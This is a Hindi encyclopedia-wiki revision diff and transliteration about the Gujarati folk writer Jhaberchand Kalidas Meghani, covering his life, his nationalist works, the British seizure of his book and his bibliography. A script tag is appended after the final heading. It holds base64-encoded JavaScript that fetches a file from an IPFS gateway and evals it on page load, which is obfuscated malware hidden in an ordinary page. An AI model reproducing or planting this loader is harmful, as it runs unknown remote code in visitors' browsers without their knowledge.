Difference between revisions of "झबेरचंद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 5 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''झबेरचंद कालीदास मेघाणी''' (जन्म- [[1897]] [[सौराष्ट्र]], मृत्यु-[[1947]]) [[गुजराती भाषा|गुजराती]] लोक-साहित्य के क्षेत्र में सर्वोपरि स्थान रखने वाले साहित्यकार थे।
झबेरचंद कालीदास मेघाणी (जन्म- [[1897]] [[सौराष्ट्र]], मृत्यु-[[1947]]) गुजराती लोक-साहित्य के क्षेत्र में सर्वोपरि स्थान रखने वाले साहित्यकार थे।
 
 
==जीवन परिचय==
 
==जीवन परिचय==
झबेरचंद का जन्म 1897 में सौराष्ट्र के चोटीला ग्राम में हुआ था। झबेरचंद अपने बचपन में भाटों और चारणों के मुख से लोकगीत सुनकर बड़ा हुआ। झबेरचंद का ध्यान लोक-साहित्य का संग्रह करने की ओर गया। फिर वह स्वयं लोक-गीतों की रचना की ओर भी प्रवृत्त हुए।
+
झबेरचंद का जन्म 1897 में [[सौराष्ट्र]] के चोटीला ग्राम में हुआ था। झबेरचंद अपने बचपन में भाटों और चारणों के मुख से लोकगीत सुनकर बड़ा हुआ। बचपन में ही झबेरचंद का ध्यान लोक-साहित्य का संग्रह करने की ओर गया। फिर झबेरचंद स्वयं लोक-गीतों की रचना की ओर प्रवृत्त होते चले गये। 
==साहित्य==
+
==कार्यक्षेत्र==
झबेरचंद ने आजीविका के लिए विभिन्न समाचारपत्रों में काम करते हुए मेघाणी ने विपुल साहित्य की रचना की। वे कवि, उपन्यासकार, कहानीकार, नाटककार, निबंधकार, जीवनी-लेखक, अनुवादक सभी रूपों में सफल हुए। उनके साहित्य का स्वर राष्ट्रवादी था। देशप्रेम, स्वतंत्रता की भावना और [[महात्मा गाँधी]] के विचारों से वे प्रभावित थे। उनकी एक कृति ‘सिघुड़ा’ को अंग्रेज़ सरकार ने जब्त कर लिया था और लेखक को दो वर्ष का कारावास भी भोगना पड़ा था। इनकी रचनाओं ने [[गुजरात]] में राष्ट्रीय चेतना के प्रसार में बहुत योग दिया।
+
झबेरचंद ने आजीविका के लिए विभिन्न समाचारपत्रों में काम करते हुए मेघाणी ने विपुल साहित्य की रचना की। वे कवि, [[उपन्यासकार]], कहानीकार, नाटककार, निबंधकार, जीवनी-लेखक, अनुवादक सभी रूपों में सफल हुए। उनके साहित्य का स्वर राष्ट्रवादी था। देशप्रेम, स्वतंत्रता की भावना और [[महात्मा गाँधी]] के विचारों से वे प्रभावित थे। उनकी एक कृति ‘सिघुड़ा’ को अंग्रेज़ सरकार ने जब्त कर लिया था और लेखक को दो वर्ष का कारावास भी भोगना पड़ा था। इनकी रचनाओं ने [[गुजरात]] में राष्ट्रीय चेतना के प्रसार में बहुत योग दिया।
==ग्रंथ==  
+
====मुख्य ग्रंथ====  
 
;लोक-साहित्य में झबेरचंद के मुख्य ग्रंथ हैं -  
 
;लोक-साहित्य में झबेरचंद के मुख्य ग्रंथ हैं -  
 
#सौराष्ट्रनी रसधार-5 भाग,  
 
#सौराष्ट्रनी रसधार-5 भाग,  
Line 17: Line 16:
 
;उपन्यासों में ‘समरोगण’, ‘गुजरातनी जय’ प्रमुख हैं।
 
;उपन्यासों में ‘समरोगण’, ‘गुजरातनी जय’ प्रमुख हैं।
  
==कविता संग्रह==
+
;कविता संग्रह
कविता-संग्रहों में ‘युग वेदना’, ‘किल्लोल’, ‘वेणीनाफूल’ अधिक चर्चित हुए हैं। झबेरचंद ने [[राणा प्रताप]], [[शाहजहाँ]], घढेला आदि नाटकों और उनके कहानी-संग्रहों की भी रचना की। झबेरचंद के द्वारा रचित कुछेक आलोचना, यात्रा-विवरण, इतिहास-ग्रंथ और जीवन-चरित्र भी प्रसिद्ध हैं। इनके प्रकाशित ग्रंथों की संख्या 88 है।  
+
कविता-संग्रहों में ‘युग वेदना’, ‘किल्लोल’, ‘वेणीनाफूल’ अधिक चर्चित हुए हैं।  
 +
;नाटक
 +
झबेरचंद ने [[राणा प्रताप]], [[शाहजहाँ]], घढेला आदि नाटकों और उनके कहानी-संग्रहों की भी रचना की।  
 +
*झबेरचंद के द्वारा रचित कुछेक आलोचना, यात्रा-विवरण, इतिहास-ग्रंथ और जीवन-चरित्र भी प्रसिद्ध हैं।  
 +
*इनके प्रकाशित ग्रंथों की संख्या 88 है।
 +
 
 
==निधन==
 
==निधन==
झबेरचंद कालीदास मेघाणी का निधन 1947 में हुआ था।<ref>{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =340| chapter = }}</ref>
+
झबेरचंद कालीदास मेघाणी का निधन [[1947]] में हुआ था।
 
 
  
{{प्रचार}}
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =340| chapter = }}
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
{{साहित्यकार}}
+
==संबंधित लेख==
[[Category:साहित्यकार]][[Category:साहित्य_कोश]]
+
{{गुजराती साहित्यकार}}{{साहित्यकार}}
[[Category:नया पन्ना]]
+
[[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:कवि]]
 +
[[Category:साहित्यकार]][[Category:साहित्य कोश]]
 +
[[Category:गुजराती साहित्यकार]][[Category:चरित कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 12:34, 19 July 2014

jhaberachand kalidas meghani (janm- 1897 saurashtr, mrityu-1947) gujarati lok-sahity ke kshetr mean sarvopari sthan rakhane vale sahityakar the.

jivan parichay

jhaberachand ka janm 1897 mean saurashtr ke chotila gram mean hua tha. jhaberachand apane bachapan mean bhatoan aur charanoan ke mukh se lokagit sunakar b da hua. bachapan mean hi jhaberachand ka dhyan lok-sahity ka sangrah karane ki or gaya. phir jhaberachand svayan lok-gitoan ki rachana ki or pravritt hote chale gaye.

karyakshetr

jhaberachand ne ajivika ke lie vibhinn samacharapatroan mean kam karate hue meghani ne vipul sahity ki rachana ki. ve kavi, upanyasakar, kahanikar, natakakar, nibandhakar, jivani-lekhak, anuvadak sabhi roopoan mean saphal hue. unake sahity ka svar rashtravadi tha. deshaprem, svatantrata ki bhavana aur mahatma gaandhi ke vicharoan se ve prabhavit the. unaki ek kriti ‘sighu da’ ko aangrez sarakar ne jabt kar liya tha aur lekhak ko do varsh ka karavas bhi bhogana p da tha. inaki rachanaoan ne gujarat mean rashtriy chetana ke prasar mean bahut yog diya.

mukhy granth

lok-sahity mean jhaberachand ke mukhy granth haian -
  1. saurashtrani rasadhar-5 bhag,
  2. sorathi bahar batiya-3 bhag,
  3. dariyapatana bahar batiya,
  4. rathiyali rat-4 bhag,
  5. chooand di-2 bhag,
  6. kankavati-2 bhag,
  7. dadajini batoan,
  8. sorati santoan adi.
upanyasoan mean ‘samarogan’, ‘gujaratani jay’ pramukh haian.
kavita sangrah

kavita-sangrahoan mean ‘yug vedana’, ‘killol’, ‘veninaphool’ adhik charchit hue haian.

natak

jhaberachand ne rana pratap, shahajahaan, ghadhela adi natakoan aur unake kahani-sangrahoan ki bhi rachana ki.

  • jhaberachand ke dvara rachit kuchhek alochana, yatra-vivaran, itihas-granth aur jivan-charitr bhi prasiddh haian.
  • inake prakashit granthoan ki sankhya 88 hai.

nidhan

jhaberachand kalidas meghani ka nidhan 1947 mean hua tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


liladhar, sharma bharatiy charit kosh (hindi). bharatadiskavari pustakalay: shiksha bharati, 340.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>